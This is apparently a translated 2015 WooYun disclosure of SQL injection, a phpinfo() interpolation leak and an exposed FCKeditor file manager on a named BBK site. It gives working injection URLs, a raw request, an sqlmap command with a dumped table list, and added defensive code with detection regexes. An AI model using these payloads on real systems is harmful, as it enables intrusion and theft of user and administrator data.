
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-096961

Title: Multiple injections on a BBK (步步高) site (user information leak and administrator password)

Vendor: BBK (步步高)

Author: 千斤拨四两

Submitted: 2015-02-16 22:25

Fix deadline: 2015-04-02 22:26

Published: 2015-04-02 22:26

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-02-16: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-04-02: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Multiple SQL injection points and exposed sensitive directories.

Details:

POST injection point; the raw request as submitted (the injectable parameter is Classid in the form body, as the sqlmap command under "Proof" shows):

POST /down_soft.php? HTTP/1.1
Host: www.bbktel.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.bbktel.com.cn/down_soft.php?
Cookie: PHPSESSID=h1dpu9m881rabcr7juq64kfcm7; Isz_sid=NGN2g2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Classid=4&pro_number=&image.x=42&image.y=4
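The Classid value above reaches the database as part of a form body. The snippet below is an added illustration, not code from the report or from the site, of the defect class behind this finding: the vulnerable pattern (splicing the POST value into SQL text) next to the hardened form (integer allow-listing plus a bound parameter). It uses an in-memory SQLite table whose name and columns are constructed here and are assumptions, not the site's real schema.

```python
import sqlite3


def make_db():
    """Constructed sample table; the name bbk_tel_pro_soft and its columns
    are assumptions for this example only."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE bbk_tel_pro_soft (id INTEGER, classid INTEGER, name TEXT)"
    )
    conn.executemany(
        "INSERT INTO bbk_tel_pro_soft VALUES (?, ?, ?)",
        [(1, 4, "rom-a"), (2, 4, "rom-b"), (3, 7, "rom-c")],
    )
    return conn


def query_unsafe(conn, classid):
    """Vulnerable pattern: the POST value is interpolated into the SQL text,
    so a quote in the value changes the query structure."""
    sql = "SELECT name FROM bbk_tel_pro_soft WHERE classid = '%s'" % classid
    return [row[0] for row in conn.execute(sql)]


def query_safe(conn, classid):
    """Hardened form: Classid is an integer, so allow-list it as one and then
    bind it as a parameter; the value can never be parsed as SQL."""
    if not isinstance(classid, str) or not classid.isdigit():
        raise ValueError("Classid must be a non-negative integer")
    sql = "SELECT name FROM bbk_tel_pro_soft WHERE classid = ?"
    return [row[0] for row in conn.execute(sql, (int(classid),))]


if __name__ == "__main__":
    db = make_db()
    print(query_unsafe(db, "4"))             # the two rows for class 4
    print(query_unsafe(db, "4' OR '1'='1"))  # every row: the quote escaped the string
    print(query_safe(db, "4"))               # the two rows for class 4
    try:
        query_safe(db, "4' OR '1'='1")
    except ValueError as exc:
        print("rejected:", exc)              # never reaches the database
```

The allow-list check is the cheap first line; the bound parameter is what actually removes the injection, and it should be applied to every parameter in the request, not only the one sqlmap happened to confirm.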


The forum is injectable as well; an error-based injection using the floor() duplicate-entry trick:

Database version, user name, and database name:
http://www.bbktel.com.cn/bbs/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),user(),database(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
SQL: SELECT * FROM [Table]usergroups u LEFT JOIN [Table]admingroups a ON u.groupid=a.admingid WHERE u.groupid IN ('10','11','12','\',') and (select 1 from (select count(*),concat(version(),user(),database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#')
Error: Duplicate entry '5.5.23-logbbktel_bbs@localhostbbk_tel1' for key 'group_key'


Exposed sensitive directories (the FCKeditor file manager and its PHP connector are reachable):

http://www.bbktel.com.cn/fckeditor/editor/filemanager/connectors/test.html
http://www.bbktel.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2Fwww.bbktel.com.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php


Proof:

[image: sqlmap.jpg]


sqlmap.py -r bbg.txt -p Classid --dbs


Database: bbk_tel
[145 tables]
+----------------------------+
| bbk_acting |
| bbk_actingpower |
| bbk_actingscore |
| bbk_guest |
| bbk_tel_actives_tab |
| bbk_tel_admin_tab |
| bbk_tel_down_ad |
| bbk_tel_down_backwall |
| bbk_tel_down_screen |
| bbk_tel_guestbook |
| bbk_tel_huodong_tab |
| bbk_tel_index_pic |
| bbk_tel_network_tab |
| bbk_tel_news_tab |
| bbk_tel_news_type |
| bbk_tel_notice |
| bbk_tel_pingmian_class |
| bbk_tel_pingmian_tab |
| bbk_tel_pro_shuoming |
| bbk_tel_pro_shuoming_class |
| bbk_tel_pro_shuoming_tab |
| bbk_tel_pro_sms |
| bbk_tel_pro_soft |
| bbk_tel_product_discuss |
| bbk_tel_product_discuss_ty |
| bbk_tel_product_picture |
| bbk_tel_product_tab |
| bbk_tel_product_type |
| bbk_tel_sold_question |
| bbk_tel_sold_zhishi |
| bbk_tel_survey |
| bbk_tel_surveyprize |
| bbk_tel_system_tab |
| bbk_tel_vote |
| bbk_tel_votelog |
| bbk_tel_voteoptions |
| bbk_tel_year |
| bbk_tel_year_book |
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mytasks |
| cdb_mythreads |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
| cdb_xreports |
| notice |
+----------------------------+


Administrator account and password:

[image: mima.png]


User information:

[image: yonghuxinxi.png]


Sensitive information disclosure (PHP variable interpolation in the scriptlang parameter of misc.php exposes phpinfo()):

www.bbktel.com.cn/bbs/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}}


[image: phpinfo.png]
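Three of the findings in this report (the floor()/information_schema error-based injection against faq.php, the reachable FCKeditor file manager, and the {${...}} interpolation in misc.php) travel in the request line and therefore land in the web server's access log. The following is an added example, not from the report, of the detection logic a defender could run over those logs: it parses combined-format lines, URL-decodes the request target, and matches one indicator per finding. The log lines are constructed here (made-up IPs, timestamps and sizes; the paths mirror the report), and the rule names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined format). IPs, timestamps and
# byte counts are made up; the request paths mirror the report's findings.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Feb/2015:22:10:01 +0800] "GET /bbs/faq.php?action=grouppermission'
    '&gids[99]=\'&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),'
    'concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a)%23 HTTP/1.1" 200 1873',
    '10.0.0.5 - - [16/Feb/2015:22:11:14 +0800] "GET /fckeditor/editor/filemanager/'
    'connectors/test.html HTTP/1.1" 200 5120',
    '10.0.0.5 - - [16/Feb/2015:22:12:30 +0800] "GET /bbs/misc.php?action=imme_binding'
    '&response[result]=1:2&scriptlang[1][2]={${phpinfo()}} HTTP/1.1" 200 44210',
    '10.0.0.9 - - [16/Feb/2015:22:13:02 +0800] "GET /down_soft.php?Classid=4 HTTP/1.1" 200 912',
    '10.0.0.9 - - [16/Feb/2015:22:13:40 +0800] "GET /bbs/faq.php?action=grouppermission'
    '&gids[1]=10 HTTP/1.1" 200 2210',
]

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Each rule is evaluated against the URL-decoded, lower-cased request target.
# Rule names are this example's own, not taken from any product.
RULES = {
    # MySQL error-based extraction: floor(rand()) duplicate-key trick or
    # direct reads of information_schema.
    "error_based_sqli": re.compile(r"floor\s*\(\s*rand\s*\(|information_schema\."),
    # Any access to the FCKeditor file-manager tree, which should not be public.
    "fckeditor_connector": re.compile(r"/fckeditor/editor/filemanager/"),
    # PHP "{${...}}" variable interpolation inside a parameter value.
    "php_curly_var_injection": re.compile(r"\{\$\{"),
}


def scan(lines):
    """Return (rule_name, raw_request_target) for every rule hit in the log."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = unquote_plus(match.group(1)).lower()
        for name, pattern in RULES.items():
            if pattern.search(target):
                findings.append((name, match.group(1)))
    return findings


if __name__ == "__main__":
    for name, target in scan(SAMPLE_LOG):
        print(f"{name}: {target}")
```

Note the gap this leaves: the Classid injection on down_soft.php is in the POST body, which an access log does not record, so log-side detection sees only the GET-based probes; the body-level injection has to be caught at the application or WAF layer, and fixed in the query code.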


Suggested fix:

There are too many holes; patch them one by one.

Copyright notice: when reposting, please credit the source: 千斤拨四两@乌云


Vendor response

Vendor reply:

The vendor could not be contacted, or the vendor actively declined to respond.